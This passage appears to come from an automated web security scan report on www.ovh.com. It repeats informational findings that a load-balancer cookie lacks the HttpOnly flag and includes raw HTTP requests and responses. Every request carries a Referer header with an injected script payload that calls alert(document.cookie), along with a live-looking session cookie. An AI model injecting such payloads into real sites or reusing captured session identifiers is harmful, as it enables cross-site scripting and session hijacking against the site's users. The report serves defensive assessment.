Last-Modified: Tue, 20 May 2008 09:51:23 GMT
ETag: "6a19-2efd-44da66c41bcc0"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:08 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 12029

/*************************************************************************
* OVH AJAX library
*
* - AJAX framework
* - multi-browser js function abstraction
**************************************
...[SNIP]...

3.119. http://www.ovh.com/js/ajax/domainSuggest.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/js/ajax/domainSuggest.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ajax/domainSuggest.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Wed, 25 Aug 2010 16:24:16 GMT
ETag: "24ccb-11d0-48ea85016a1a9"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:09 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 4560

window.addEvent('domready',function(){if($('domainInput')&&$('content')){domainSuggestInit();checkMouseout.periodical(1000);}});function checkMouseout(){if(!domainSuggestVars.isMouseOver)removeSugges
...[SNIP]...

3.120. http://www.ovh.com/js/base64.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/js/base64.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/base64.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Wed, 14 Nov 2007 13:10:01 GMT
ETag: "6a20-b6f-43ee348757c40"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:08 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 2927

/**
*
* Base64 encode / decode
*
**/

Base64 = {

   // private property
   _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",

   // public method for encoding
   encode : functi
...[SNIP]...

3.121. http://www.ovh.com/js/calendar.compat.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/js/calendar.compat.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/calendar.compat.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 12 Jun 2009 12:42:05 GMT
ETag: "70ad-8386-46c260927c140"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:06 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 33670

// Calendar: a Javascript class for Mootools that adds accessible and unobtrusive date pickers to your form elements <http://electricprism.com/aeron/calendar>
// Calendar RC4, Copyright (c) 2007 Aeron
...[SNIP]...

3.122. http://www.ovh.com/js/mootools-core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/js/mootools-core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/mootools-core.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 01 Feb 2011 17:20:26 GMT
ETag: "22af6-104ee-49b3bbf96d6fa"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:05 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 66798

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2009 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.5",build:"008d
...[SNIP]...

3.123. http://www.ovh.com/js/mootools-more.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/js/mootools-more.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/mootools-more.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 01 Feb 2011 17:20:26 GMT
ETag: "22afa-b18c-49b3bbf96f4a4"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:06 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 45452

//MooTools More, <http://mootools.net/more>. Copyright (c) 2006-2009 Aaron Newton <http://clientcide.com/>, Valerio Proietti <http://mad4milk.net> & the MooTools team <http://mootools.net/developers>,
...[SNIP]...

3.124. http://www.ovh.com/js/spyweb.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/js/spyweb.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/spyweb.js HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Wed, 28 Nov 2007 11:11:31 GMT
ETag: "6a27-2589-43ffb4272bec0"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:08 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Language: fr
Content-Length: 9609

spyweb_addrScriptTraceur = "/cgi-bin/spyweb.pl";
spyweb_idPage=-1; //id number of the page
spyweb_timeToReload=3000; //number of seconds before next reload
spyweb_idTimeout=0; //id of
...[SNIP]...

3.125. http://www.ovh.com/themes/10/bars.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/bars.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/bars.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Feb 2011 16:24:37 GMT
ETag: "2b8c69-2024-49ce16a9e9c7b"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:05 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Language: fr
Content-Length: 8228

/* ----------------------------*/
/* ------- TELECOM BAR --------*/
/* ----------------------------*/

#tel_nav {
background:url('../../images/bars/telecom/bar.jpg') no-repeat;
width:960px;
...[SNIP]...

3.126. http://www.ovh.com/themes/10/footer.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/footer.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/footer.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Feb 2011 16:24:37 GMT
ETag: "2b8c5f-2cb-49ce16a9e3ac5"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:05 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Language: fr
Content-Length: 715

/* ----------------------------- */
/* ---------- Footers ---------- */
/* ----------------------------- */
#footer {
text-align : center;
width: 989px;
display: block;
margin: 0 a
...[SNIP]...

3.127. http://www.ovh.com/themes/10/header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/header.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/header.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Feb 2011 16:24:37 GMT
ETag: "2b8c45-20f6-49ce16a9d8e37"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:05 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Language: fr
Content-Length: 8438

.../* CSS Document */

/* --------------- */
/* --- TOP MENU --- */
/* --------------- */

#header {
margin: 0 auto;
padding: 0;
   text-align: left;
   width: 989px;
/* h
...[SNIP]...

3.128. http://www.ovh.com/themes/10/main/bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/main/bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/main/bg.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "11860c-585c-4882b4cbd39af"
Accept-Ranges: bytes
Content-Length: 22620
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:46:19 GMT
Age: 1700
Content-Type: image/jpeg

......JFIF.....H.H.....C......................    ....
   ..


.......

................................................................4.....................!..1AQ."2aq...B..R#..3b..CS..........?....l=.
...[SNIP]...

3.129. http://www.ovh.com/themes/10/main/body-top.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/main/body-top.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/main/body-top.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118618-10f4-4882b4cbdfcf5"
Accept-Ranges: bytes
Content-Length: 4340
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:46:20 GMT
Age: 1700
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

..........................,.......................................<.......................U........!16u..#ARqs3Qbr."7B.$&2a5E......
...[SNIP]...

3.130. http://www.ovh.com/themes/10/main/head-bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/main/head-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/main/head-bg.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "11860a-29d6-4882b4cbd17d6"
Accept-Ranges: bytes
Content-Length: 10710
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:46:19 GMT
Age: 1700
Content-Type: image/jpeg

......JFIF.....#.#.....C......................    ....
   ..


.......

................................................................1.....................!..1A.."2Qaq.B...R.#3...bC........?..I.......
...[SNIP]...

3.131. http://www.ovh.com/themes/10/main/home.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/main/home.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/main/home.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118604-240-4882b4cbcb404"
Accept-Ranges: bytes
Content-Length: 576
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:14:41 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a..(..T.fffgggiiijjjkkklllmmmnnnoooppprrrwwwxxx|||}}}...........................................................................................................................................
...[SNIP]...

3.132. http://www.ovh.com/themes/10/main/hr.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/main/hr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/main/hr.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "11861a-126-4882b4cbe1d27"
Accept-Ranges: bytes
Content-Length: 294
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:14:41 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a.....!.]]]........................................................................................................................................................................................
...[SNIP]...

3.133. http://www.ovh.com/themes/10/main/logo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/main/logo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/main/logo.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "1185f8-1bd1-4882b4cbbef40"
Accept-Ranges: bytes
Content-Length: 7121
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:46:19 GMT
Age: 1700
Content-Type: image/jpeg

......JFIF.....#.#.....C......................    ....
   ..


.......

.......................C.............
.........................................................4.L.................................
...[SNIP]...

3.134. http://www.ovh.com/themes/10/main/menu-bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/main/menu-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/main/menu-bg.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118614-1572-4882b4cbdbcb5"
Accept-Ranges: bytes
Content-Length: 5490
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:46:20 GMT
Age: 1700
Content-Type: image/jpeg

......JFIF.....#.#.....C......................    ....
   ..


.......

..........................6.......................................G........................a...Q.!1V.....F...6ABq."2..v..#$Rfs...3C
...[SNIP]...

3.135. http://www.ovh.com/themes/10/main/tools.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/main/tools.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/main/tools.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
